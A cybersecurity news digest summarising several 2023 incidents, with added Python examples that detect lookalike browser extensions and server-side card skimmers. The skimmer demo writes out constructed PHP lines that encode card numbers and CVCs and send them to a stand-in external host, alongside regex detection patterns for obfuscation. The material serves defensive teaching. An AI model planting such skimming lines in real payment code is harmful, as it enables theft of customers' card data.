Cyber Security Headlines: Dole data breach, Nexus banking trojan, Pwn2Own Vancouver 2023

Dole discloses data breach after February ransomware attack

Last month, the food multinational Dole Food Company announced that it had suffered a ransomware attack that impacted its operations. It has now confirmed that the threat actors behind the attack had access to the information of an undisclosed number of employees. Although the company downplayed the impact on its operations, it was forced to shut down production plants and shipments for a short period.

(Security Affairs)

New Android banking trojan targets financial apps

Already adopted by threat actors to target 450 financial applications, Nexus provides the main features needed to perform account takeover (ATO) attacks against banking portals and cryptocurrency services, such as credential theft and SMS interception. It appears to be in an early stage of development and is advertised as a subscription service for a monthly fee of $3,000. Details of the malware were first documented by Cyble earlier this month, and the majority of Nexus infections reported so far have been in Turkey.

(The Hacker News)

Pwn2Own Vancouver 2023 Day 1: Windows 11 and Tesla hacked

On the first day of Pwn2Own Vancouver 2023, security researchers successfully demonstrated Tesla Model 3, Windows 11, and macOS zero-day exploits and exploit chains to win $375,000 and a Tesla Model 3. Adobe Reader, Microsoft’s SharePoint team collaboration platform, and Oracle VirtualBox were also taken down. After zero-day vulnerabilities are demonstrated and disclosed during Pwn2Own, vendors have 90 days to create and release security fixes for all reported flaws before Trend Micro’s Zero Day Initiative publicly discloses them.

(Bleeping Computer)

Bogus ChatGPT extension steals Facebook cookies

Google has removed a ChatGPT extension from the Chrome store that steals Facebook session cookies – but not before more than 9,000 users had installed it. The malicious extension – Chat GPT For Google (note the erroneous space in the name of the chatbot) – is very similar in name and code to the real ChatGPT For Google extension. In fact, the phony extension is based on the same open source project used by the actual ChatGPT For Google tool – all the fraudsters had to do was add a few lines of cookie-stealing code. The cookie thieves push the fake add-on through malicious, sponsored Google Search results for “Chat GPT 4,” the researchers said, thus capitalizing on users who want to try out the latest version of the chatbot. 

(The Register)
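The two things that made this extension dangerous are visible in its manifest before a single line of its code is read: a name that collapses to the same string as the legitimate extension once spacing and case are ignored, and the `cookies` permission combined with host access to facebook.com. The following script is an added example, not code from the article or from either extension, and the manifests it reads are constructed samples; the list of vetted extension names and of sensitive hosts are assumptions you would replace with your own.

```python
import json
import re

# Constructed sample manifests for this demo (hypothetical contents; they are
# not the real extensions' files).
LOOKALIKE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Chat GPT For Google",
    "version": "1.0.0",
    "permissions": ["cookies", "storage", "tabs"],
    "host_permissions": ["https://*.facebook.com/*", "https://www.google.com/*"],
    "background": {"service_worker": "background.js"},
})

BENIGN_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "ChatGPT for Google",
    "version": "1.0.0",
    "permissions": ["storage"],
    "host_permissions": ["https://www.google.com/*"],
})

# Names of extensions you have already vetted (assumption for the demo).
KNOWN_NAMES = {"ChatGPT for Google"}
# Hosts whose session cookies would hand an attacker the account
# (assumption; extend with your own identity providers and SaaS tenants).
SENSITIVE_HOSTS = ("facebook.com", "google.com", "microsoft.com", "okta.com")


def _normalize(name: str) -> str:
    """Collapse case, spaces and punctuation so that 'Chat GPT For Google'
    and 'ChatGPT for Google' compare equal."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def _host_patterns(manifest: dict) -> list:
    """Return host match patterns; MV2 manifests put them in 'permissions'."""
    hosts = list(manifest.get("host_permissions", []))
    if manifest.get("manifest_version", 2) < 3:
        hosts += [p for p in manifest.get("permissions", [])
                  if "://" in p or p == "<all_urls>"]
    return hosts


def review_manifest(text: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    m = json.loads(text)
    name = m.get("name", "")
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    hosts = _host_patterns(m)
    findings = []

    # 1. Lookalike name: equal to a vetted extension after normalisation,
    #    but not the exact vetted string.
    if name not in KNOWN_NAMES and _normalize(name) in {_normalize(k) for k in KNOWN_NAMES}:
        findings.append(f"lookalike name: {name!r}")

    # 2. The 'cookies' permission is what lets an extension read session
    #    cookies through chrome.cookies.getAll(); it only matters together
    #    with host access, so report which hosts it reaches.
    if "cookies" in perms:
        broad = [h for h in hosts if h == "<all_urls>" or h.startswith("*://")
                 or h.startswith("http://*/") or h.startswith("https://*/")]
        sensitive = [h for h in hosts if any(s in h for s in SENSITIVE_HOSTS)]
        if broad:
            findings.append("cookies permission with broad host access: " + ", ".join(broad))
        if sensitive:
            findings.append("cookies permission covering sensitive hosts: " + ", ".join(sensitive))
        if not broad and not sensitive:
            findings.append("cookies permission requested")
    return findings


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_MANIFEST), ("lookalike", LOOKALIKE_MANIFEST)):
        print(label, review_manifest(text) or ["no findings"])
```

The name check deliberately treats only an exact string match as known: a submission that differs from a vetted name by nothing but a space is the pattern the article describes, and it should be reviewed rather than waved through. The `cookies` check reports hosts rather than simply failing, because a cookie-manager extension legitimately needs that permission; what an extension called "... For Google" does not need is cookie access to facebook.com.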

Thanks to this week’s episode sponsor, Conveyor

Does the thought of answering another security questionnaire make you want to beat the stuffing out of 32 pinatas? 
Then you might want to check out Conveyor: the end-to-end trust platform helping infosec teams reduce incoming questionnaires and fly through the ones they do have to complete.
Give customers access to a self-serve trust portal to download docs and FAQs. For any remaining questionnaires that do come in, use our GPT-Questionnaire response tool or white-glove questionnaire completion service to knock them completely off your to-do list. 
Learn more at

Stealthy hacks show advancements in China’s cyberespionage operations, researchers say

A string of recently discovered digital intrusions appears to indicate that hackers linked to China are increasingly adept at evading detection once they are inside a victim’s network. This conclusion comes from researchers at Sentinel Labs and the German IT services company QGroup, who studied several intrusions into unnamed Middle Eastern telecoms. Those attacks indicate that a years-long China-aligned cyberespionage operation has been actively updating its tooling through a series of modifications to a widely used credential theft software package, the researchers said in a joint analysis published Thursday.


UK government sets out vision for NHS cybersecurity

The UK government has published a new strategy designed to boost cyber-resilience in the health and social care sector by 2030 with the goal of helping the sector’s disparate organizations improve cyber-risk management, data protection and incident response and recovery. Although the details will not be ready until summer, the government shared the five pillars of the new strategy, designed to minimize cyber risk and improve incident response. They are:

• Identify where disruption will cause the greatest harm to patients, such as disruption to critical services

• Unite the sector to take advantage of scale, tap national resources and expertise, and accelerate response

• Ensure leaders are engaged, employees know the cyber basics and more security specialists are recruited

• Embed security into emerging technology to better protect it from cyber-threats

• Support every health and care organization to minimize the impact of incidents and recovery time

(InfoSecurity Magazine)

Hackers inject credit card stealers into payment processing modules

A new credit card stealing campaign is doing things differently from what we have seen in the past: it hides its malicious code inside the ‘’ payment gateway module for WooCommerce, allowing the breach to evade detection by security scans. Historically, when threat actors breached a commerce site such as Magento or WordPress running WooCommerce, they injected malicious JavaScript into the HTML of the store or customer checkout pages. However, many online merchants now work with security companies that scan the HTML of public-facing eCommerce sites for malicious scripts, making it harder for threat actors to stay hidden. To evade detection, the threat actors are now injecting malicious code directly into the site’s server-side payment gateway modules, which process credit card payments at checkout. Because these modules are usually only invoked after a user submits their credit card details and completes checkout, the injection never appears in the rendered page and is harder for scanners that only look at the public HTML to detect.

(Bleeping Computer)
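The point of the technique is that the rendered checkout page stays clean while the theft happens in server-side PHP. The script below is an added example, not code from the article or from WooCommerce: it runs the kind of check an external HTML scanner performs over a constructed checkout page, then scans the source of a constructed, simplified gateway module in both its clean and its backdoored form. The module, its field names, the allowed gateway host and the exfiltration host are all assumptions made for the demo.

```python
import re

# Constructed PHP fragments standing in for a WooCommerce payment gateway
# module (hypothetical and simplified; not any real plugin's code). The
# class name, field names and hosts are assumptions for this demo.
CLEAN_MODULE = r'''<?php
class WC_Gateway_Demo extends WC_Payment_Gateway {
    public function process_payment( $order_id ) {
        $order = wc_get_order( $order_id );
        $card  = wc_clean( $_POST['demo-card-number'] );
        $resp  = wp_remote_post( 'https://api.demo-gateway.example/charge',
            array( 'body' => array( 'card' => $card, 'amount' => $order->get_total() ) ) );
        return array( 'result' => 'success', 'redirect' => $this->get_return_url( $order ) );
    }
}
'''

# The same module with two constructed skimmer lines spliced in ahead of the
# legitimate call: the card data is encoded and sent to a host the gateway has
# no business talking to. Checkout still succeeds, so the merchant sees nothing.
INJECTED_MODULE = CLEAN_MODULE.replace(
    "        $resp  = wp_remote_post(",
    r'''        $_x = base64_encode( json_encode( array( 'c' => $card, 'v' => $_POST['demo-card-cvc'] ) ) );
        @file_get_contents( 'https://cdn-stats.invalid/p.php?d=' . $_x );
        $resp  = wp_remote_post(''',
)

# Constructed rendered checkout page as a customer (or an external HTML
# scanner) sees it; none of the injected PHP shows up here.
CHECKOUT_HTML = '''<form id="payment" method="post">
  <input name="demo-card-number"><input name="demo-card-cvc">
  <script src="https://shop.example/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
</form>'''

# Hosts the site is expected to contact (assumption for the demo).
ALLOWED_HOSTS = {"api.demo-gateway.example", "shop.example"}

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
CARD_FIELD = re.compile(r"\$_POST\[\s*['\"][^'\"]*(?:card|cvc|cvv|expir|pan)[^'\"]*['\"]\s*\]", re.I)
OBFUSCATION = re.compile(r"\b(base64_(?:en|de)code|gzinflate|str_rot13|eval|create_function)\s*\(", re.I)
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)


def scan_html(html: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Client-side checks of the kind external scanners run on the rendered page."""
    findings = []
    for host in URL_HOST.findall(html):
        if host.lower() not in allowed_hosts:
            findings.append(f"resource loaded from unexpected host {host}")
    for body in INLINE_SCRIPT.findall(html):
        if re.search(r"card|cvc|cvv|atob\(|fromCharCode", body, re.I):
            findings.append("inline script touching card fields or obfuscated")
    return findings


def scan_module(src: str, allowed_hosts=ALLOWED_HOSTS) -> dict:
    """Server-side check of the gateway module's own source."""
    touches_card = bool(CARD_FIELD.search(src))
    foreign = sorted({h.lower() for h in URL_HOST.findall(src) if h.lower() not in allowed_hosts})
    obfuscation = sorted({f.lower() for f in OBFUSCATION.findall(src)})
    return {
        "touches_card_fields": touches_card,
        "foreign_hosts": foreign,
        "obfuscation": obfuscation,
        # A gateway legitimately handles card fields; it becomes suspicious when
        # that handling is combined with an unexpected destination or an encoding trick.
        "suspicious": touches_card and bool(foreign or obfuscation),
    }


if __name__ == "__main__":
    print("rendered page:", scan_html(CHECKOUT_HTML) or "clean")
    print("clean module:", scan_module(CLEAN_MODULE))
    print("injected module:", scan_module(INJECTED_MODULE))
```

The HTML scan reports nothing for either version of the module, which is exactly the blind spot the campaign exploits; only reading the module source on the server turns up the unexpected host and the encoding call. Pattern matching like this is a triage aid, not the control: the durable check is to verify installed plugin files against the hashes of the pristine release, and to alert on any outbound connection from the web tier to a host that is not on the payment gateway's allowlist.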

North Korean APT group ‘Kimsuky’ targeting experts with new spearphishing campaign

German and South Korean government agencies this week warned about a new spearphishing campaign from a notorious North Korean group targeting experts on the peninsula. The campaign gains access to victims’ Google accounts by infecting Android phones through a malicious app on Google Play and by using a malicious Chromium web browser extension. The attack mainly targets experts on the Korean Peninsula and North Korea, but since the technique exploited in this attack can be used universally, it could also be turned against foreign affairs and security think tanks around the world as well as unspecified individuals.

(The Record)